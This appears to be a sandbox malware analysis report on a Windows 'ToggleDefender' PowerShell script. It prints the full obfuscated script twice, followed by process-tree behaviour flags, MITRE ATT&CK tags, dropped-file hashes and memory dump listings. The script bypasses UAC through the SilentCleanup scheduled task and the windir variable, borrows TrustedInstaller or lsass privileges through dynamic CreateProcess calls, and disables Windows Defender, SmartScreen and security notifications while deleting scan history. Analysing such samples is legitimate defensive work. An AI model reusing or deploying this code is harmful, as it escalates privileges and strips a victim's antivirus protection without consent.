     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller3⤵
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start TrustedInstaller3⤵
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" start lsass3⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Create or Modify System Process
1Windows Service
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f02abc9024612c398416c2ffc6714cd1
SHA11dcc103dc68ba954ecd1a2c9229237ebf6534956
SHA25605410dbad347c52be976902e0e1806b07c49de40bc49bedf277a534d38d6762c
SHA512fef6c9a795d2a4e5d927ebc5cffcc01ed3abc199164c084c02a898d8363512709e0fcf460e1178418a5d114ca242ea69ef504794a06f2a1eff8b8ba981e572bc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e6ba042dce89e4408c63c90b55f9e0d4
SHA113aee11ce539398241eefac7d562f551af054a52
SHA256d7404b13cf8eae8790272d568f1ce8b1614561c6c25e5cd6246e8d1dc93c206d
SHA5122b434c9bcfad83a58218ae422b0d3004e2b23755f272d4633fd7f9553fade16843568ad839abc1ffdbe127bca62d9dc5f106c3d8ef5617c4da8de05113887152
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5903dd097e8b2c8bb426ed99a913c2821
SHA14ecc4a94d7c88faf53fe12897bc0c8112ed57016
SHA256cc6dc58f1d7bb6a3dc70a1ea7cae87d46af1f843e581299392896dec867764c6
SHA5123045f7c42371c01675b45277d66d7cf3069c2967107f3cbedff28691a980f3d0f15663bb9e19de91e3306776d9a1549c5894708d6e7ccfb176e807bcea6ff48d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5abc27673d9c940ad74b41c58391d2412
SHA19a31a521a521dcd0f974ce6f7a50aecc69a50df0
SHA256cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357
SHA512c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b0cfdab278bf3db6d14817b1e701e4ee
SHA17ec7d56340dcaff7b6bf3d0e4b35be5bd57e87b8
SHA2560554687e2254846915ac9d734989c77cfc0417bdd6607dd64dde2fb2dcc55854
SHA51240a621b3ef79c9f74c937b4f04ef18bcc78bc7436c2035885bd8651b4ffc072152c6e87087be432c43860256c5e89ef33d57bb27822d36f18b8b9bda9208d4ca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD532df5b692fd3878857c0157e39711c0b
SHA11a6a22796fbb96467a9640340e6e6b8e8a30bb8d
SHA256aae20143a1b016f1dcb68aa3a8ac13924e73a56409c7ab460b430ec9ad96fd46
SHA5128aec353eb0eed24eeb03e081e26db08b5356ff6716a16ee56a248722a852885c98220988c7974870ad494410226d5d1e61742ff6fbec45ea408dc1339c75753d
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpj3desk.jtc.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1296-54-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/1296-42-0x00000205C9B10000-0x00000205C9B20000-memory.dmpFilesize
64KB
-
memory/1296-41-0x00000205C9B10000-0x00000205C9B20000-memory.dmpFilesize
64KB
-
memory/1296-40-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/1444-118-0x00007FFB8AC30000-0x00007FFB8AE25000-memory.dmpFilesize
2.0MB
-
memory/1444-73-0x000000001CAD0000-0x000000001CB36000-memory.dmpFilesize
408KB
-
memory/1444-148-0x000000001B660000-0x000000001B670000-memory.dmpFilesize
64KB
-
memory/1444-115-0x000000001C9F0000-0x000000001C9FE000-memory.dmpFilesize
56KB
-
memory/1444-0-0x0000000000A00000-0x0000000000A18000-memory.dmpFilesize
96KB
-
memory/1444-117-0x000000001CA00000-0x000000001CA0E000-memory.dmpFilesize
56KB
-
memory/1444-39-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/1444-75-0x000000001CCF0000-0x000000001CCFE000-memory.dmpFilesize
56KB
-
memory/1444-76-0x000000001D0D0000-0x000000001D1F2000-memory.dmpFilesize
1.1MB
-
memory/1444-151-0x00007FFB8AC30000-0x00007FFB8AE25000-memory.dmpFilesize
2.0MB
-
memory/1444-150-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/1444-3-0x000000001B660000-0x000000001B670000-memory.dmpFilesize
64KB
-
memory/1444-122-0x000000001CD40000-0x000000001CD4A000-memory.dmpFilesize
40KB
-
memory/1444-1-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/1444-120-0x000000001CD10000-0x000000001CD1A000-memory.dmpFilesize
40KB
-
memory/1444-116-0x000000001DCF0000-0x000000001DE24000-memory.dmpFilesize
1.2MB
-
memory/1444-69-0x000000001B660000-0x000000001B670000-memory.dmpFilesize
64KB
-
memory/1444-70-0x000000001B660000-0x000000001B670000-memory.dmpFilesize
64KB
-
memory/1444-72-0x000000001CB50000-0x000000001CBC6000-memory.dmpFilesize
472KB
-
memory/1444-74-0x000000001BFE0000-0x000000001BFFE000-memory.dmpFilesize
120KB
-
memory/1840-164-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/1840-176-0x00000286E9890000-0x00000286E98A0000-memory.dmpFilesize
64KB
-
memory/1840-186-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/1840-182-0x00000286E9890000-0x00000286E98A0000-memory.dmpFilesize
64KB
-
memory/1840-178-0x00000286E9890000-0x00000286E98A0000-memory.dmpFilesize
64KB
-
memory/1972-36-0x0000022C63250000-0x0000022C63260000-memory.dmpFilesize
64KB
-
memory/1972-38-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/1972-28-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/1972-29-0x0000022C63250000-0x0000022C63260000-memory.dmpFilesize
64KB
-
memory/1972-30-0x0000022C63250000-0x0000022C63260000-memory.dmpFilesize
64KB
-
memory/2088-68-0x00007FFB6C9E0000-0x00007FFB6D4A1000-memory.dmpFilesize
10.8MB
-
memory/2088-66-0x0000016E6A390000-0x0000016E6A3A0000-memory.dmpFilesize
64KB
-
